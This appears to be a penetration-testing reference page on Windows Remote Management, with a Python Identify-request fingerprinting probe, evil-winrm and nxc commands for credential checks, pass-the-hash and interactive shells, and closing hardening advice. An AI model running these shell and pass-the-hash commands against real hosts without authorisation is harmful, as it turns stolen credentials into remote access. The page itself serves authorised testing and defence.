WinRM
aka Windows Remote Management, PSRemoting
Windows Remote Management listens on 5985 (HTTP) and 5986 (HTTPS) and is the transport PowerShell Remoting runs over, roughly the Windows equivalent of SSH for admin shells. With a valid password or NT hash for an account in Remote Management Users or local Administrators, evil-winrm gives a full interactive PowerShell session.
Ports
| Port | Proto | Notes |
|---|---|---|
| 5985 | tcp | WinRM (HTTP) |
| 5986 | tcp | WinRM (HTTPS) |
Fingerprint
- Server: Microsoft-HTTPAPI/2.0 response header on 5985 (nmap labels it Microsoft HTTPAPI httpd 2.0); the WS-Management endpoint is /wsman
- nxc winrm <TARGET> -u user -p pass reports whether a given set of creds can log in
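The banner alone only tells you that http.sys is listening; the WS-Management Identify request tells you the listener is WinRM and which authentication methods it offers, without credentials. The probe below is an added example written for this page, not code from nxc, evil-winrm or the page's author. It sends the Identify request the way Test-WSMan does (the WSMANIDENTIFY: unauthenticated header is what lets WinRM answer without a logon) and parses the reply; the two sample replies at the bottom are constructed by hand to mirror a stock host (an unauthenticated Identify hides the OS version as 0.0.0) and a 401 from a listener that also has Basic enabled, so the parser can be exercised offline.

```python
"""Unauthenticated WinRM fingerprint via a WS-Management Identify request.

Added example for this page; SAMPLE_OK and SAMPLE_401 are constructed replies,
not captures from a real host.
"""
import http.client
import sys
import xml.etree.ElementTree as ET

SOAP = "http://www.w3.org/2003/05/soap-envelope"
WSMID = "http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"

# WS-Management Identify request (DMTF DSP0226); no credentials involved.
IDENTIFY_BODY = (
    f'<s:Envelope xmlns:s="{SOAP}" xmlns:wsmid="{WSMID}">'
    "<s:Header/><s:Body><wsmid:Identify/></s:Body></s:Envelope>"
)


def send_identify(host, port=5985, timeout=5):
    """POST the Identify request to /wsman and return (status, headers, body).

    headers maps lower-cased header names to a list of values so repeated
    WWW-Authenticate headers on a 401 are all kept.
    """
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request(
        "POST",
        "/wsman",
        body=IDENTIFY_BODY,
        headers={
            "Content-Type": "application/soap+xml;charset=UTF-8",
            # Same header Test-WSMan sends; without it WinRM demands auth.
            "WSMANIDENTIFY": "unauthenticated",
        },
    )
    resp = conn.getresponse()
    headers = {}
    for name, value in resp.getheaders():
        headers.setdefault(name.lower(), []).append(value)
    body = resp.read().decode("utf-8", "replace")
    conn.close()
    return resp.status, headers, body


def parse_identify(status, headers, body):
    """Turn a raw reply into a fingerprint dict.

    A 200 carries the IdentifyResponse (vendor/version/protocol); a 401 tells
    us which auth schemes the listener accepts. Anything else is not WinRM
    unless the Server header still says Microsoft-HTTPAPI/2.0.
    """
    server = ", ".join(headers.get("server", []))
    result = {
        "http_status": status,
        "server": server,
        "is_winrm": "Microsoft-HTTPAPI/2.0" in server,
        "auth_methods": [],
        "vendor": None,
        "version": None,
        "protocol": None,
    }
    if status == 401:
        for value in headers.get("www-authenticate", []):
            for challenge in value.split(","):
                # "Basic realm=..." -> "Basic"; "Negotiate" -> "Negotiate"
                result["auth_methods"].append(challenge.strip().split(" ")[0])
        return result
    if status == 200 and body.lstrip().startswith("<"):
        try:
            root = ET.fromstring(body)
        except ET.ParseError:
            return result

        def text(tag):
            el = root.find(f".//{{{WSMID}}}{tag}")
            return el.text.strip() if el is not None and el.text else None

        result["vendor"] = text("ProductVendor")
        result["version"] = text("ProductVersion")
        result["protocol"] = text("ProtocolVersion")
        result["is_winrm"] = result["is_winrm"] or result["vendor"] == "Microsoft Corporation"
    return result


# Constructed sample replies (not captured from a real host).
SAMPLE_OK = (
    200,
    {"server": ["Microsoft-HTTPAPI/2.0"],
     "content-type": ["application/soap+xml;charset=UTF-8"]},
    f'<s:Envelope xmlns:s="{SOAP}" xmlns:wsmid="{WSMID}"><s:Header/><s:Body>'
    "<wsmid:IdentifyResponse>"
    "<wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion>"
    "<wsmid:ProductVendor>Microsoft Corporation</wsmid:ProductVendor>"
    "<wsmid:ProductVersion>OS: 0.0.0 SP: 0.0 Stack: 3.0</wsmid:ProductVersion>"
    "</wsmid:IdentifyResponse></s:Body></s:Envelope>",
)
SAMPLE_401 = (
    401,
    {"server": ["Microsoft-HTTPAPI/2.0"],
     "www-authenticate": ["Negotiate", 'Basic realm="WSMAN"']},
    "",
)

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target is None:
        print(parse_identify(*SAMPLE_OK))
        print(parse_identify(*SAMPLE_401))
    else:
        print(parse_identify(*send_identify(target)))
```

Run it with a target for a live probe (python3 winrm_identify.py <TARGET>) or with no arguments to see the parser over the constructed samples. A Stack: 3.0 answer with vendor Microsoft Corporation is WinRM; a 401 listing only Negotiate means you will need a domain or local account (or an NT hash via NTLM), while Basic in the list means the listener is weaker than it should be.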
Default / weak creds
No service-specific defaults: WinRM authenticates ordinary Windows accounts, so you need a valid password or NT hash, and the account must be in Remote Management Users or local Administrators.
Exploitation primitives
- evil-winrm -i <TARGET> -u user -p pass for an interactive PowerShell session
- Pass-the-hash: evil-winrm -i <TARGET> -u user -H <NThash>
- HTTPS listener: add -S -P 5986 to either of the above
- Confirm access first with nxc winrm (a [+] means you can log in)
Overview
WinRM is the WS-Management service that PowerShell Remoting runs over; 5985 is the HTTP listener most machines expose. It is the standard way to turn a recovered Windows credential or NT hash into an interactive shell, provided the account is allowed to remote in.
Enumeration
Validate access (use -H for a hash):
nxc winrm <TARGET> -u user -p pass
Interactive shell with credentials:
evil-winrm -i <TARGET> -u user -p pass
Pass-the-hash:
evil-winrm -i <TARGET> -u user -H <NThash>
Notes
Membership in Remote Management Users or local Administrators is required; a password that nxc reports as valid elsewhere but fails here usually means the account simply lacks that membership. Check it in BloodHound (the CanPSRemote edge) or via group membership on the host.
Hardening
Scope the 5985/5986 listener to admin jump hosts with the host firewall, use the HTTPS listener on 5986 with a real certificate and disable Basic and unencrypted auth, and keep Remote Management Users (and local Administrators) to the accounts that genuinely need a remote shell.